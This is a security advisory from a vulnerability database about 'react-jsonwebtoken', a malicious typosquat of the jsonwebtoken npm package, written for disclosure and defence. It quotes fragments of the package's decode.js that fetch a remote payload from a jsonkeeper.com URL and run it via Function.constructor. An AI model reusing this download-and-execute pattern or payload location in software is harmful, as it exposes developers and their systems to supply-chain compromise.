VDB
GCVE-110-OSM-2026-7083
GCVE-110-OSM-2026-7083
Advisory PublishedCVSS 9.6/10
This package is a typosquat of the legitimate 'jsonwebtoken' library (authored under 'auth0') but published by a brand-new single-package account 'polaris202607' pointing to an unrelated repository (radix-ui/primitives). The core attack is in decode.js, which fetches a remote payload from the paste/staging service jsonkeeper.com and executes it via Function.constructor() — a classic download-and-execute pattern. The combination of remote code execution from an untrusted paste service, dynamic code execution via Function constructor, and the clear typosquatting identity makes this unambiguously malicious. The attacker model is a supply chain attack targeting developers who mistype 'jsonwebtoken' as 'react-jsonwebtoken'.
ENTRY
index.js (main: index.js)
EXFIL
- Fetch and Eval/Exec in decode.js: "axios.get("https://jsonkeeper.com/b/E69V3"); const createHandler = (errCode) => ..."
- Payload Download from Paste Service in decode.js: "jsonkeeper.com"
- Network Request in decode.js: "axios.get("
ADDITIONAL FINDINGS
- Dynamic Code Execution in decode.js: "Function.constructor("
- Brand New Package
- Malicious Dependency Detected in package.json
PAYLOAD FILES
decode.js
INDICATORS (IOCs)
- domains: openid.net
- payloadFileHash: 58ff55bc86bc3c045aaf4dcf1ed7d12dd6f3e38763a9a8dfdc8ac74ab1cf01c0
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | react-jsonwebtoken | all (affected) | — |
Browse GCVE Records
72,337 records in the GCVE database · Updated July 14, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.